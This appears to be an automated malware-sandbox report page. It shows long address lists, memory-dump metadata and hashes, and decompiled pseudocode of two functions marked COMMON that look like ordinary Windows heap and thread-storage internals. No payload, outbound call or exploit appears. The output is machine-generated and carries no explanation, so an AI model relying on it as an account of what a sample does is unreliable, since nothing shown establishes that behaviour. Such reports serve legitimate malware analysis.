0x02aeb531
0x02aeb534
0x02a9db21
0x02a9db21
0x02a9db24
0x02a9dcd9
0x02a9dce2
0x02a9dce5
0x02a9dd6a
0x02a9dd6d
0x00000000
0x02a9dd73
0x02aeb51a
0x02aeb51c
0x02aeb51f
0x02aeb524
0x00000000
0x02aeb524
0x02a9dce7
0x02a9dce7
0x02a9dce7
0x00000000
0x02a9dce7
0x00000000
0x02a9db2a
0x02a9db2c
0x02a9db31
0x02a9db33
0x02a9db36
0x02a9db39
0x02a9db3b
0x02a9db66
0x02a9db66
0x02a9db3d
0x02a9db3d
0x02a9db3e
0x02a9db46
0x02a9db47
0x02a9db49
0x02a9db4c
0x02a9db53
0x02a9db55
0x02a9db58
0x02a9db5a
0x02aeb50a
0x02aeb50f
0x02aeb512
0x02a9db60
0x02a9db60
0x02a9db63
0x02a9db63
0x00000000
0x02a9db63
0x02a9db5a
0x02a9db3b
0x02a9db24
0x02a9db69
0x02a9db69
0x02a9db6c
0x02a9db6f
0x02a9db74
0x02aeb557
0x02aeb557
0x02aeb55e
0x02a9db7a
0x02a9db7c
0x02a9db7f
0x02a9db82
0x02a9db85
0x00000000
0x02a9db8b
0x02a9db8b
0x02a9db8d
0x02a9db9b
0x02a9db9b
0x02a9db9d
0x02a9dba0
0x02a9dba2
0x02a9dba4
0x02a9dba7
0x02a9dba9
0x02a9dbae
0x02a9dbae
0x02a9dbb1
0x02a9dbb4
0x02a9dbb4
0x02a9dbb7
0x02a9dbba
0x02a9dcd2
0x02a9dcd4
0x00000000
0x02a9dbc0
0x02a9dbc0
0x02a9dbd2
0x02a9dbd7
0x02a9dbda
0x02a9dbdd
0x02a9dbdf
0x00000000
0x02a9dbe5
0x02a9dbe5
0x02a9dbee
0x02a9dbf1
0x02aeb541
0x02aeb544
0x00000000
0x02aeb546
0x02aeb546
0x00000000
0x02aeb546
0x02a9dbf7
0x02a9dbf7
0x02a9dbfd
0x02a9dbfd
0x02a9dbff
0x02a9dc0b
0x02a9dc15
0x02a9dc1b
0x02a9dc1d
0x02a9dc21
0x02a9dc21
0x02a9dc23
0x02a9dc23
0x02a9dc26
0x02a9dc29
0x02a9dc2b
0x00000000
0x00000000
0x02a9dc31
0x02a9dc34
0x02a9dc36
0x02a9dcbf
0x02a9dcbf
0x02a9dcc2
0x00000000
0x02a9dc3c
0x02a9dc41
0x02a9dc43
0x00000000
0x02a9dc45
0x02a9dc45
0x02a9dc47
0x00000000
0x02a9dc4d
0x02a9dc4d
0x02a9dc50
0x02a9dc52
0x02a9dc55
0x02a9dcfa
0x02a9dcfe
0x02a9dd08
0x02a9dd0a
0x02a9dd0c
0x00000000
0x02a9dd12
0x02a9dd15
0x02a9dd2d
0x02a9dd2f
0x02a9dd32
0x02a9dd35
0x00000000
0x02a9dd35
0x02a9dc5b
0x02a9dc5b
0x02a9dc5e
0x02a9dc61
0x02a9dc64
0x02a9dc67
0x02a9dc67
0x02a9dc6a
0x02a9dc6c
0x02a9dc8e
0x02a9dc8e
0x02a9dc91
0x02a9dc93
0x02a9dcce
0x02a9dcce
0x02a9dc95
0x02a9dc9c
0x02a9dc6e
0x02a9dc72
0x02a9dc75
0x02a9dc77
0x02a9dc79
0x02aeb551
0x02aeb551
0x00000000
0x02a9dc7f
0x02a9dc7f
0x02a9dc81
0x00000000
0x02a9dc83
0x02a9dc86
0x02a9dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x02a9dc88
0x02a9dc81
0x02a9dc79
0x02a9dc6c
0x02a9dc55
0x02a9dc47
0x02a9dc43
0x00000000
0x02a9dc36
0x02a9dc23
0x00000000
0x02a9dbff
0x02a9dbf1
0x02a9dbdf
0x02a9db8f
0x02a9db92
0x02a9db95
0x00000000
0x00000000
0x00000000
0x00000000
0x02a9db95
0x02a9db8d
0x02a9db85
0x02a9db74
0x02a9dc9f
0x02a9dca2
0x02a9dcb0
0x02a9dcb0
0x02a9dad1
0x02aeb4e5
0x02aeb4c8
0x00000000
0x00000000
0x00000000
0x02a9d831
0x02a9d80d
0x00000000
0x02a9d800
0x02aeb47f
0x02aeb485
0x00000000
0x02aeb485
0x02a9d665
0x02a9d652
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11390759a48e6c894b679fee1bebc4f76deab7ab74ec3cc6de5b7c0e2649bbd
Instruction ID: 46f9d517d2b621ca27617d3557a53290174d01e43705662537b7a114d4c72e36
Opcode Fuzzy Hash: b11390759a48e6c894b679fee1bebc4f76deab7ab74ec3cc6de5b7c0e2649bbd
Instruction Fuzzy Hash: 87E1A030A00755CFDF24EF25C984BA9B7F2BF45308F044599D94A97291DF349985CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02A9849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E02A9849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x2b5f9c0);
				E02ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x2b77b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E02A9CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E02AA2280( *[fs:0x30], 0x2b78550);
						_t139 =  *0x2b77b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E02ABF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E02A9FFB0(_t193, _t235, 0x2b78550);
								L5:
								return E02ADD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E02A81C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x2b77b9c; // 0x0
							_t235 = L02AA4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x2b77b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E02ABA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E02A9FFB0(_t193, _t235, 0x2b78550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L02AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L02AA77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x2b77b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x2b77b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E02AC37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x2b77b9c; // 0x0
									_t214 = L02AA4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E02AC37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x2b77b10 =  *0x2b77b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x2b77b04 =  *0x2b77b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L02AA77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L02AA77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x2b77b08 =  *0x2b77b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E02AC57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E02ACF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L02AA77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E02ABA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L02AA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E02AC96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x02a9849b
0x02a9849b
0x02a9849b
0x02a9849b
0x02a9849d
0x02a984a2
0x02a984a7
0x02a984b1
0x02a984d8
0x00000000
0x02a984b3
0x02a984c4
0x02a984c9
0x02a984cd
0x02a984cf
0x02a984cf
0x02a984d6
0x02a984e6
0x02a984e9
0x02a984ec
0x02a984ef
0x02a984f2
0x02a984f4
0x02a984fc
0x02a98501
0x02a98506
0x02a98509
0x02a986e0
0x02a986e5
0x02a986e8
0x02a986ed
0x02a986f0
0x02a986f2
0x02ae9afd
0x02ae9b02
0x02a984da
0x02a984df
0x02a984df
0x02a986fa
0x02a986fd
0x02a986fe
0x02a98701
0x02a98706
0x02a98709
0x02a9870b
0x00000000
0x00000000
0x02a98711
0x02a98725
0x02a98727
0x02a9872a
0x02a9872c
0x02ae9af0
0x02ae9af5
0x02a98732
0x02a98732
0x02a98732
0x02a98735
0x02a98737
0x02a98515
0x02a98515
0x02a98518
0x02a9851d
0x02a98523
0x02a98527
0x02a9852b
0x02a98537
0x02a98539
0x02a9853c
0x02a9853e
0x02a9868c
0x02a98691
0x02a98699
0x02a9869b
0x02a98744
0x02a98748
0x02a986a1
0x02a986a1
0x02a986a1
0x02a986a4
0x02a986a8
0x02ae9bdf
0x02ae9bdf
0x02a986ae
0x02a986b0
0x00000000
0x02a986b6
0x00000000
0x02ae9be9
0x02a986b0
0x02a98544
0x02a9854a
0x02a9854d
0x02a98551
0x02a9876e
0x02a98778
0x02a9877b
0x02a98780
0x02a98557
0x02a98557
0x02a9855d
0x02a9855d
0x02a9856b
0x02a9856e
0x02a98570
0x02a98573
0x02a98576
0x02a98576
0x02a98579
0x02a9857b
0x00000000
0x00000000
0x02a98581
0x02a985a0
0x02a985a2
0x02a985a5
0x02a985a7
0x02ae9b1b
0x02ae9b1b
0x02a9862e
0x02a9862e
0x02a98631
0x02a98631
0x02a98634
0x02a98636
0x02a98669
0x02a98669
0x02a9866b
0x02ae9bbf
0x02ae9bc4
0x02ae9bc8
0x02ae9bce
0x02ae9bce
0x02a98671
0x02a98671
0x02a98674
0x02a98676
0x02ae9bae
0x02ae9bae
0x02a98676
0x02a9867c
0x02a9867e
0x02a98688
0x02a98688
0x00000000
0x02a9867e
0x02a98638
0x02a98638
0x02a9863b
0x02a9863e
0x02a9863f
0x02a98642
0x02a98645
0x02a98648
0x02a9864d
0x02ae9b69
0x02ae9b6e
0x02ae9b7b
0x02ae9b81
0x02ae9b85
0x02ae9b89
0x02ae9ba7
0x02ae9b8b
0x02ae9b91
0x02ae9b9a
0x02ae9b9f
0x02ae9b9f
0x02a98788
0x02a9878d
0x02a98763
0x02a98763
0x02a98766
0x00000000
0x02a98766
0x02ae9b70
0x00000000
0x02ae9b70
0x02a98656
0x02a9865a
0x02a9865c
0x02a98752
0x02a98756
0x00000000
0x00000000
0x02a9875e
0x00000000
0x02a9875e
0x02a98662
0x02a98662
0x02a98662
0x02a98666
0x00000000
0x02a98666
0x02a985b7
0x02a985b9
0x02a985bc
0x02a985bf
0x02a985cc
0x02a985d1
0x02a985d4
0x02a985db
0x02a985de
0x02a985e0
0x02ae9b5f
0x00000000
0x02ae9b5f
0x02a985e6
0x02a985ea
0x02a986c3
0x02a986c5
0x02a986c8
0x02a986ca
0x02ae9b16
0x00000000
0x02ae9b16
0x02a986d6
0x02a985f6
0x02a985f6
0x02a985f9
0x02a98602
0x02a98606
0x02a9860a
0x02a9860b
0x02a9860e
0x02a98611
0x00000000
0x02a98611
0x02a985f3
0x00000000
0x02a985f3
0x02a98619
0x02a9861e
0x02a9861e
0x02a98621
0x02a98622
0x02a98623
0x02a98625
0x02a9862c
0x00000000
0x02a9873d
0x00000000
0x02a9873d
0x02a98737
0x02a9850f
0x02a98512
0x00000000
0x02a98512
0x00000000
0x02a984d6

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906f575394ec372630a8159ef94e72e1f9ed744c12e5ac85a60775489fc1b836
Instruction ID: 29218ef316176f68a258fbc6f3c3128e3d7867b473cf468af8c608cd7a6db9d2
Opcode Fuzzy Hash: 906f575394ec372630a8159ef94e72e1f9ed744c12e5ac85a60775489fc1b836
Instruction Fuzzy Hash: F3B12670E00349DFDF14DFAAC994AAEBBF6BF49304F10412AE506AB245DB74A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AB513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02AB513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2b7d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E02ACD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E02AA2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L02AA4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E02ACF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E02A9FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x2b7b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E02ACB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x02ab5142
0x02ab514c
0x02ab5150
0x02ab5157
0x02ab5159
0x02ab515e
0x02ab5165
0x02ab5169
0x02ab516c
0x02ab5172
0x02ab5176
0x02ab517a
0x02ab517a
0x02ab517a
0x02ab517f
0x02af6d8b
0x02af6d8e
0x02af6d91
0x02af6d95
0x02af6d98
0x02af6d9c
0x02af6da0
0x02af6da3
0x02af6da7
0x02af6e26
0x02af6e26
0x02af6e2a
0x02ab51f9
0x02ab51f9
0x02ab51fe
0x02af6e33
0x02af6e33
0x02af6e39
0x02af6e3d
0x02af6e46
0x02af6e50
0x00000000
0x00000000
0x02af6e52
0x02af6e53
0x02af6e56
0x02af6e5d
0x00000000
0x00000000
0x00000000
0x02af6e5f
0x02af6e67
0x02af6e77
0x02af6e7f
0x02af6e80
0x02af6e88
0x02af6e90
0x02af6e9f
0x02af6ea5
0x02af6ea9
0x02af6eb1
0x02af6ebf
0x00000000
0x00000000
0x02af6ecf
0x02af6ed3
0x00000000
0x00000000
0x02af6edb
0x02af6ede
0x02af6ee1
0x02af6ee8
0x02af6eeb
0x02af6eed
0x02af6ef0
0x02af6ef4
0x02af6ef8
0x02af6efc
0x00000000
0x00000000
0x02af6f0d
0x02af6f11
0x02af6f32
0x02af6f37
0x02af6f3b
0x02af6f3e
0x02af6f41
0x02af6f46
0x00000000
0x00000000
0x02af6f4c
0x02af6f50
0x02af6f50
0x02af6f54
0x02af6f62
0x02af6f65
0x02af6f6d
0x02af6f7b
0x02af6f7b
0x02af6f93
0x02af6f98
0x02af6fa0
0x02af6fa6
0x02af6fb3
0x02af6fb6
0x02af6fbf
0x02af6fc1
0x02af6fd5
0x02af6fda
0x02af6fda
0x02af6fdd
0x02af6fe2
0x02af6fe7
0x02af6feb
0x02af6fef
0x02af6ff3
0x02ab520c
0x02ab520c
0x02ab520f
0x02ab5215
0x02ab5234
0x02ab523a
0x02ab523a
0x02ab5244
0x02ab5245
0x02ab5246
0x02ab5251
0x02ab5251
0x02af6f13
0x02af6f17
0x02af6f17
0x02af6f18
0x02af6f1b
0x02af6f1f
0x02af6f23
0x00000000
0x02af6f28
0x02ab5204
0x02ab5204
0x02ab5208
0x00000000
0x02ab5208
0x02ab5185
0x02ab5188
0x02ab518a
0x02ab518e
0x02ab5195
0x02af6db1
0x02af6db5
0x02af6db9
0x02ab519b
0x02ab519b
0x02ab519e
0x02ab51a7
0x02ab51a9
0x02ab51a9
0x02ab51b5
0x02ab51b8
0x02ab51bb
0x02ab51be
0x02ab51c1
0x02ab51c5
0x02ab51c9
0x02ab51cd
0x02ab51cd
0x02ab51d8
0x02ab51dc
0x02ab51e0
0x02af6dcc
0x02af6dd0
0x02af6dd5
0x02af6ddd
0x02af6de1
0x02af6de1
0x02af6de5
0x02af6deb
0x02af6df1
0x02af6df7
0x02af6dfd
0x02af6e01
0x02af6e05
0x02af6e09
0x02af6e0d
0x02af6e11
0x02af6e11
0x02ab51eb
0x02af6e1a
0x02af6e1f
0x02af6e21
0x02af6e23
0x00000000
0x02ab51f1
0x02ab51f1
0x00000000
0x02ab51f1

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
